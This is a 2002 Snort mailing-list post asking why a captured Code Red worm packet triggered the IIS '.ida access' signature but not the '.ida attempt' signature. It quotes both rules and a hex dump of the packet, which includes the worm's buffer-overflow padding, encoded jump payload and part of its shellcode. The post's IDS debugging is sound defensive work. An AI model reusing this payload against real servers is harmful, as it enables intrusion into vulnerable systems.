[Snort-sigs] problems with .ida attempt rule in current rules and snort 1.9?

Russell Fulton r.fulton at ...575...
Sun Aug 18 14:51:03 EDT 2002


For the record this alert was logged by:Version 1.9.0beta2 (Build 184)

This looks like a bug in 1.9 so I've cc'ed this to the developer's list.

Two rules from recent snort-current set:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-IIS
ISAPI .ida attempt"; uricontent:".ida?"; nocase; dsize:>239;
flow:to_server,established; reference:arachnids,552;
classtype:web-application-attack; reference:bugtraq,1065;
reference:cve,CAN-2000-0071; sid:1243;  rev:6;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-IIS
ISAPI .ida access"; uricontent:".ida"; nocase;
flow:to_server,established; reference:arachnids,552;
classtype:web-application-activity; reference:cve,CAN-2000-0071;
reference:bugtraq,1065; sid:1242;  rev:6;)

Question:  why did this packet match the second rule and not the first?

[**] WEB-IIS ISAPI .ida access [**]
08/18-19:16:15.714702 218.84.57.53:4170 -> 130.216.128.114:80
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:1458
***AP*** Seq: 0xD0E8E21C  Ack: 0xB7141A40  Win: 0x7F0A  TcpLen: 20
0x0000: 00 E0 1E 8E 31 71 00 00 0C 46 5C D1 08 00 45 10  ....1q...F\...E.
0x0010: 05 B2 00 00 00 00 F0 06 00 00 DA 54 39 35 82 D8  ...........T95..
0x0020: 80 72 10 4A 00 50 D0 E8 E2 1C B7 14 1A 40 50 18  .r.J.P....... at ...763...
0x0030: 7F 0A 00 00 00 00 47 45 54 20 2F 64 65 66 61 75  ......GET /defau
0x0040: 6C 74 2E 69 64 61 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E  lt.ida?NNNNNNNNN
0x0050: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0060: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0070: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0080: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0090: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00A0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00B0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00C0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00D0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00E0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x00F0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0100: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0110: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0120: 4E 4E 4E 4E 4E 4E 4E 25 75 39 30 39 30 25 75 36  NNNNNNN%u9090%u6
0x0130: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25  858%ucbd3%u7801%
0x0140: 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64  u9090%u6858%ucbd
0x0150: 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36  3%u7801%u9090%u6
0x0160: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25  858%ucbd3%u7801%
0x0170: 75 39 30 39 30 25 75 39 30 39 30 25 75 38 31 39  u9090%u9090%u819
0x0180: 30 25 75 30 30 63 33 25 75 30 30 30 33 25 75 38  0%u00c3%u0003%u8
0x0190: 62 30 30 25 75 35 33 31 62 25 75 35 33 66 66 25  b00%u531b%u53ff%
0x01A0: 75 30 30 37 38 25 75 30 30 30 30 25 75 30 30 3D  u0078%u0000%u00=
0x01B0: 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E  a  HTTP/1.0..Con
0x01C0: 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 74 2F  tent-type: text/
0x01D0: 78 6D 6C 0A 48 4F 53 54 3A 77 77 77 2E 77 6F 72  xml.HOST:www.wor
0x01E0: 6D 2E 63 6F 6D 0A 20 41 63 63 65 70 74 3A 20 2A  m.com. Accept: *
0x01F0: 2F 2A 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74  /*.Content-lengt
0x0200: 68 3A 20 33 35 36 39 20 0D 0A 0D 0A 55 8B EC 81  h: 3569 ....U...
0x0210: EC 18 02 00 00 53 56 57 8D BD E8 FD FF FF B9 86  .....SVW........
0x0220: 00 00 00 B8 CC CC CC CC F3 AB C7 85 70 FE FF FF  ............p...
0x0230: 00 00 00 00 E9 0A 0B 00 00 8F 85 68 FE FF FF 8D  ...........h....
0x0240: BD F0 FE FF FF 64 A1 00 00 00 00 89 47 08 64 89  .....d......G.d.
0x0250: 3D 00 00 00 00 E9 6F 0A 00 00 8F 85 60 FE FF FF  =.....o.....`...
0x0260: C7 85 F0 FE FF FF FF FF FF FF 8B 85 68 FE FF FF  ............h...
0x0270: 83 E8 07 89 85 F4 FE FF FF C7 85 58 FE FF FF 00  ...........X....
0x0280: 00 E0 77 E8 9B 0A 00 00 83 BD 70 FE FF FF 00 0F  ..w.......p.....
0x0290: 85 DD 01 00 00 8B 8D 58 FE FF FF 81 C1 00 00 01  .......X........
0x02A0: 00 89 8D 58 FE FF FF 81 BD 58 FE FF FF 00 00 00  ...X.....X......
0x02B0: 78 75 0A C7 85 58 FE FF FF 00 00 F0 BF 8B 95 58  xu...X.........X
0x02C0: FE FF FF 33 C0 66 8B 02 3D 4D 5A 00 00 0F 85 9A  ...3.f..=MZ.....
0x02D0: 01 00 00 8B 8D 58 FE FF FF 8B 51 3C 8B 85 58 FE  .....X....Q<..X.
0x02E0: FF FF 33 C9 66 8B 0C 10 81 F9 50 45 00 00 0F 85  ..3.f.....PE....
0x02F0: 79 01 00 00 8B 95 58 FE FF FF 8B 42 3C 8B 8D 58  y.....X....B<..X
0x0300: FE FF FF 8B 54 01 78 03 95 58 FE FF FF 89 95 54  ....T.x..X.....T
0x0310: FE FF FF 8B 85 54 FE FF FF 8B 48 0C 03 8D 58 FE  .....T....H...X.
0x0320: FF FF 89 8D 4C FE FF FF 8B 95 4C FE FF FF 81 3A  ....L.....L....:
0x0330: 4B 45 52 4E 0F 85 33 01 00 00 8B 85 4C FE FF FF  KERN..3.....L...
0x0340: 81 78 04 45 4C 33 32 0F 85 20 01 00 00 8B 8D 58  .x.EL32.. .....X
0x0350: FE FF FF 89 8D 34 FE FF FF 8B 95 54 FE FF FF 8B  .....4.....T....
0x0360: 85 58 FE FF FF 03 42 20 89 85 4C FE FF FF C7 85  .X....B ..L.....
0x0370: 48 FE FF FF 00 00 00 00 EB 1E 8B 8D 48 FE FF FF  H...........H...
0x0380: 83 C1 01 89 8D 48 FE FF FF 8B 95 4C FE FF FF 83  .....H.....L....
0x0390: C2 04 89 95 4C FE FF FF 8B 85 54 FE FF FF 8B 8D  ....L.....T.....
0x03A0: 48 FE FF FF 3B 48 18 0F 8D C0 00 00 00 8B 95 4C  H...;H.........L
0x03B0: FE FF FF 8B 02 8B 8D 58 FE FF FF 81 3C 01 47 65  .......X....<.Ge
0x03C0: 74 50 0F 85 A0 00 00 00 8B 95 4C FE FF FF 8B 02  tP........L.....
0x03D0: 8B 8D 58 FE FF FF 81 7C 01 04 72 6F 63 41 0F 85  ..X....|..rocA..
0x03E0: 84 00 00 00 8B 95 48 FE FF FF 03 95 48 FE FF FF  ......H.....H...
0x03F0: 03 95 58 FE FF FF 8B 85 54 FE FF FF 8B 48 24 33  ..X.....T....H$3
0x0400: C0 66 8B 04 0A 89 85 4C FE FF FF 8B 8D 54 FE FF  .f.....L.....T..
0x0410: FF 8B 51 10 8B 85 4C FE FF FF 8D 4C 10 FF 89 8D  ..Q...L....L....
0x0420: 4C FE FF FF 8B 95 4C FE FF FF 03 95 4C FE FF FF  L.....L.....L...
0x0430: 03 95 4C FE FF FF 03 95 4C FE FF FF 03 95 58 FE  ..L.....L.....X.
0x0440: FF FF 8B 85 54 FE FF FF 8B 48 1C 8B 14 0A 89 95  ....T....H......
0x0450: 4C FE FF FF 8B 85 4C FE FF FF 03 85 58 FE FF FF  L.....L.....X...
0x0460: 89 85 70 FE FF FF EB 05 E9 0D FF FF FF E9 16 FE  ..p.............
0x0470: FF FF 8D BD F0 FE FF FF 8B 47 08 64 A3 00 00 00  .........G.d....
0x0480: 00 83 BD 70 FE FF FF 00 75 05 E9 38 08 00 00 C7  ...p....u..8....
0x0490: 85 4C FE FF FF 01 00 00 00 EB 0F 8B 8D 4C FE FF  .L...........L..
0x04A0: FF 83 C1 01 89 8D 4C FE FF FF 8B 95 68 FE FF FF  ......L.....h...
0x04B0: 0F BE 02 85 C0 0F 84 8D 00 00 00 8B 8D 68 FE FF  .............h..
0x04C0: FF 0F BE 11 83 FA 09 75 21 8B 85 68 FE FF FF 83  .......u!..h....
0x04D0: C0 01 8B F4 50 FF 95 90 FE FF FF 3B F4 90 43 4B  ....P......;..CK
0x04E0: 43 4B 89 85 34 FE FF FF EB 2A 8B F4 8B 8D 68 FE  CK..4....*....h.
0x04F0: FF FF 51 8B 95 34 FE FF FF 52 FF 95 70 FE FF FF  ..Q..4...R..p...
0x0500: 3B F4 90 43 4B 43 4B 8B 8D 4C FE FF FF 89 84 8D  ;..CKCK..L......
0x0510: 8C FE FF FF EB 0F 8B 95 68 FE FF FF 83 C2 01 89  ........h.......
0x0520: 95 68 FE FF FF 8B 85 68 FE FF FF 0F BE 08 85 C9  .h.....h........
0x0530: 74 02 EB E2 8B 95 68 FE FF FF 83 C2 01 89 95 68  t.....h........h
0x0540: FE FF FF E9 53 FF FF FF 8B 85 68 FE FF FF 83 C0  ....S.....h.....
0x0550: 01 89 85 68 FE FF FF 8B 4D 08 8B 91 84 00 00 00  ...h....M.......
0x0560: 89 95 6C FE FF FF C7 85 4C FE FF FF 04 00 00 00  ..l.....L.......
0x0570: C6 85 D0 FE FF FF 68 8B 45 08 89 85 D1 FE FF FF  ......h.E.......
0x0580: C7 85 D5 FE FF FF 5B 53 53 FF C7 85 D9 FE FF FF  ......[SS.......
0x0590: 63 78 90 90 8B 4D 08 8B 51 10 89 95 50 FE FF FF  cx...M..Q...P...
0x05A0: 83 BD 50 FE FF FF 00 75 26 8B F4 6A 00 8D 85 4C  ..P....u&..j...L
0x05B0: FE FF FF 50 8B 8D 68 FE FF FF 51 8B 55 08 8B 42  ...P..h...Q.U..B

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Some code red packets are being matched by the 'attempt' rule but many
are not.  This has been a problem for the whole of this months CodeRed
cycle.

-- 
Russell Fulton, Computer and Network Security Officer
The University of Auckland,  New Zealand

"It aint necessarily so"  - Gershwin





More information about the Snort-sigs mailing list